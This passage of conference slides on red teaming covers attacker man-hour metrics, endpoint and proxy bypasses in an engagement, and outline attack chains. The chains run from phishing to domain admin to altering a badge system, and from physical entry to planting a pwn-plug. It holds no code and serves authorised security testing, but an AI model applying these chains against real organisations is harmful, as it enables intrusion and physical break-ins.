  • 31. Giving Customers Man Hour Metrics • Nothing will ever STOP an attacker – the goal is to make target difficult to attack. • How difficult is difficult? • At what point would an attacker move on to another vector or another company because this target is too difficult to break into. • At what point in the above can/will the organization detect the activity and respond? J
  • 32. Strategic Security, Inc. © http://www.strategicsec.com/ • End-Point Protection Stopped The Exploit • Popular Flash, Java exploits worked, but end-point protection stopped the exploit Example Customer Slide 1
  • 33. Strategic Security, Inc. © http://www.strategicsec.com/ • Security Mechanisms that had to be bypassed during this engagement • XXXXXXXXX Endpoint Protection • This required custom exe compilation, encoding, embedding in spreadsheet • 8 man hours (Level 3 Rating) • XXXXXXXXX Web Proxy • Used SSL Encryption • Less than 5 minutes (Level 2 Rating) • XXXXXXXXX Managed Security Service • Used SSL Encryption • Less than 5 minutes (Level 2 Rating) Example Customer Slide 2 J
  • 34. Strategic Security, Inc. © http://www.strategicsec.com/ Most Likely Attack Vectors Keys To The Kingdom External Websites Wireless Network Physical Social Engineering Internal Network
  • 35. Red Teaming • Once an organization can defend/detect against a Level 2 attacker its time to consider Red Teaming. C
  • 36. Red Teaming • The term Red Team originated within the military to describe a team whose purpose is to penetrate security of "friendly" installations, and thus test their security measures. This method of testing allows for the highest level of real world attacks to be simulated and used to expose the potential weak points of an organization’s total Information Security program.
  • 37. Why Red Teaming • We typically test “stovepiped” environments. • Q1 we do network pentesting • Q2 we do phishing • Q3 we do wifi • Q4 we do physical C
  • 38. Red Teaming • Typical Electronic Pentesting: Electronic • Network Pentesting • Wifi • Web Application • Phishing
  • 39. Red Teaming • Social Engineering Social • In Person Social Engineering • Phone Conversation • Social Profiling
  • 40. Red Teaming • Physical Attacks Physical • Facility access • Lock picking, tailgating • Defeating Physical Controls • Badge recovery/cloning
  • 41. Why Red Teaming • The problem is that tests can be scoped to “pass” each of these areas when they are tested individually, with no analysis on how compromise of one effects another.
  • 42. Red Teaming • What is convergence “The merging of distinct technologies, industries, or devices into a unified whole.” http://www.merriam-webster.com/dictionary/convergence “The combining of different forms of electronic technology, such as data processing and word processing converging into information processing.” http://www.thefreedictionary.com/convergence
  • 44. Red Teaming • Electronic/Social to Physical Compromise • Access to company via phishing attack – Escalate to domain administrator – Set up shop for persistent access • Locate physical security users/computer – Electronically compromise badge system (ex Lenel/CCURE)
  • 45. Red Teaming • Electronic/Social to Physical Compromise • Add a profile/change the picture of existing profile.
  • 46. Red Teaming • Original “Eric Smith”
  • 47. Red Teaming • New “Eric Smith” 
  • 48. Red Teaming • Electronic/Social to Physical Compromise • With picture/info changed. • Go to facility, get a temporary badge • Using access to badge system upgrade the temporary badge
  • 49. Red Teaming • Now with all access 
  • 50. Red Teaming • Physical to Electronic Compromise • In person Physical Attack – Either by Social Engineering – Fake Badges – Tailgating – Pure physical
  • 51. Red Teaming • Physical to Electronic Compromise
  • 52. Red Teaming • Physical to Electronic Compromise
  • 53. Red Teaming • Physical to Electronic Compromise • Once inside compromise a computer or leave a pwn-plug for persistent electronic access.
  • 54. Red Teaming • Physical to Electronic Compromise
  • 55. Red Teaming • Physical to Electronic Compromise
  • 57. Holla @ CG.... Email: cgates [ ] laresconsulting [ ] com Twitter: http://twitter.com/carnal0wnage Work http://lares.com Blog http://carnal0wnage.attackresearch.com
  • 58. Strategic Security, Inc. © http://www.strategicsec.com/ Holla @ j0e.... Toll Free: 1-866-892-2132 Email: [email protected] Twitter: http://twitter.com/j0emccray Slideshare: http://www.slideshare.net/joemccray LinkedIn: http://www.linkedin.com/in/joemccray